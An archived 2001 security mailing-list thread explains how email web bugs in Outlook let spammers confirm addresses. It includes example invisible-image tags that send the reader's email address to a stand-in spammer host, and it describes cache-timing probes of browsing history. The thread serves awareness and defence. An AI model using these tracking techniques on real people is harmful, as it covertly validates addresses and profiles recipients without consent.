afaik, webbugs work like this: Spammer X sends you an HTML mail with an invisible image from his site <img src=http://www.weluvspam.com/bug.gif height=1 whidth=1> ) When you read this email in Outlook, the image (bug.gif) is downloaded from the spammers site. If the image is generated by a CGI script he can log the time you read your mail, and validate your address. for example, instead of bug.gif, he could use a script to create the image: <img src=youremailat_private">http://www.weluvspam.com/createimage.php?mail=youremailat_private > the script (createimage.php) could : save the "mail=youremailat_private" parameter to a database of valid email addresses save the time of the day you checked your mail (combined with the time the email was sent - taken from a database- it can be used to know how often a person checks his mail, and at what time) determine wheter you visited a certain website recently (timming how long it takes to load an image from that website. if it loads inmediatly, then you probably have it in your browsers cache) Mariano ----- Original Message ----- From: "Dom De Vitto" <Domat_private> To: "Peter Pekala" <peterpat_private>; "abuse" <postmasterat_private>; "Focus-MS" <focus-msat_private> Cc: "VULN-DEV@SECURITYFOCUS. COM" <VULN-DEVat_private>; "BUGTRAQ@SECURITYFOCUS. COM" <BUGTRAQat_private>; <win2ksecadviceat_private> Sent: Tuesday, August 28, 2001 5:42 AM Subject: RE: Email webbugs > Webbugs are NOT return receipts!! > Everybody should *at least* have return-receipts set to 'prompt'. > That is a no-brainer. > Web bugs are totally different, and can divulg a lot more information - > especially when tallied with cross-host information. > > Dom > -----Original Message----- > From: Peter Pekala [mailto:peterpat_private] > Sent: 27 August 2001 17:11 > To: abuse; Focus-MS > Cc: VULN-DEV@SECURITYFOCUS. COM; BUGTRAQ@SECURITYFOCUS. COM; > win2ksecadviceat_private > Subject: Re: Email webbugs > > > In Outlook Express - Have you tried configuring this through Tools - > Options - Receipts - Returning Read Receipts ? > > - Peter > > > : One of the things that has always bothered me about Outlook Express and > : Outlook is that they are susceptable to webbugs. Basically there are no > : options to block confirmation of your reading an email so any spammer can > : verify that your address is active as long as they can get you to just > view > : an email. > : > : A lot of people have difficulty understanding exactly what this means so I > : set up a demonstration page at http://www.nthelp.com/OEtest/oe.htm in an > : attempt to raise awareness of this nonsense and get MS to do something > about > : it. I don't know if other email programs like Eudora and Netscape are > : vulnerable to email webbugs so if anyone tests those please let me know > the > : results. > : > : Anyway, I've made the test site available to the public now so if you want > : to check your email reader, feel free. > : > : Geo. > : > > > > --------------------------------------------- Servicio provisto por EDUNEXO ---------------------------------------------
This archive was generated by hypermail 2b30 : Tue Aug 28 2001 - 12:46:16 PDT
